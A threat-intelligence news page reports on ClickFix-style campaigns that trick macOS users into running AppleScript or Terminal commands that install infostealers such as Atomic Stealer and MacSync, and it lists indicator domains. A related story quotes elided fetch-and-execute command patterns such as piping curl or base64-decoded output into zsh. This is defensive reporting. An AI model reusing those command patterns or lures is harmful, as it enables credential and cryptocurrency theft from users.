ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a ClickFix-style campaign targeting macOS users that swaps Terminal-based execution for Script Editor to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the applescript:// URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses curl with TLS certificate validation disabled, and pipes the response directly into zsh for in-memory execution.
The activity, discovered by Jamf Threat Labs, ultimately downloads and launches a Mach-O variant of Atomic Stealer, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me.
Timeline
Apr 9, 2026
Researchers link campaign to supporting infrastructure
Analysis tied the campaign to infrastructure including dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me. The operation was described as targeting macOS users to steal browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data.
Apr 9, 2026
Jamf Threat Labs identifies Atomic Stealer macOS campaign in the wild
Jamf researchers documented an active campaign delivering a variant of Atomic Stealer through Script Editor on macOS. They reported that the script fetched remote content with curl using disabled TLS certificate validation, executed it in memory, and ultimately downloaded a Mach-O payload.
Apr 9, 2026
Attackers shift ClickFix delivery from Terminal to macOS Script Editor
After Apple’s Terminal-focused protections, attackers adapted their technique by using the applescript:// URL scheme to open Script Editor with a pre-filled malicious AppleScript. The lure used fake Apple-themed disk cleanup pages to socially engineer users into running the script.
Apr 9, 2026
Apple adds Terminal paste-scanning protections in macOS 26.4
Apple introduced protections in macOS 26.4 to scan pasted commands in Terminal and warn users about potentially suspicious activity. The new safeguards were intended to reduce abuse of Terminal-based social engineering techniques such as ClickFix-style attacks.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Sources
Related Stories
ClickFix Social Engineering Campaigns Using Terminal Commands to Install Stealers
Multiple reports highlighted **ClickFix**-style social engineering that convinces users to paste attacker-supplied commands into a terminal, leading to infostealer installation. Malwarebytes documented a macOS lure impersonating *CleanMyMac* via `cleanmymacos[.]org`, where victims are instructed to run a Terminal command that prints a reassuring message, decodes a hidden (base64) destination, and then downloads and executes a remote shell script via `zsh`. The resulting payload installs **SHub Stealer**, which targets saved passwords, browser data, Apple Keychain contents, Telegram sessions, and cryptocurrency wallets; it can also tamper with wallet applications (e.g., *Exodus*, *Atomic Wallet*, *Ledger Live*) to enable later theft of recovery phrases. Microsoft threat intelligence (as reported by The Hacker News) described a parallel **Windows** ClickFix campaign that shifts from the traditional Run-dialog paste to **Windows Terminal** (`wt.exe`) using the `Win + X → I` shortcut, exploiting the tool’s administrative legitimacy to reduce suspicion and evade detections tuned to Run-dialog abuse. In that chain, users paste a hex-encoded/XOR-compressed command that spawns additional Terminal/PowerShell stages to decode scripts, download a ZIP payload plus a legitimate-but-renamed **7-Zip** binary, extract additional components, establish persistence via **scheduled tasks**, configure **Microsoft Defender exclusions**, and ultimately deploy **Lumma Stealer** (including use of `QueueUserAPC()` for injection).
1 months ago
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Yesterday
ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
3 days ago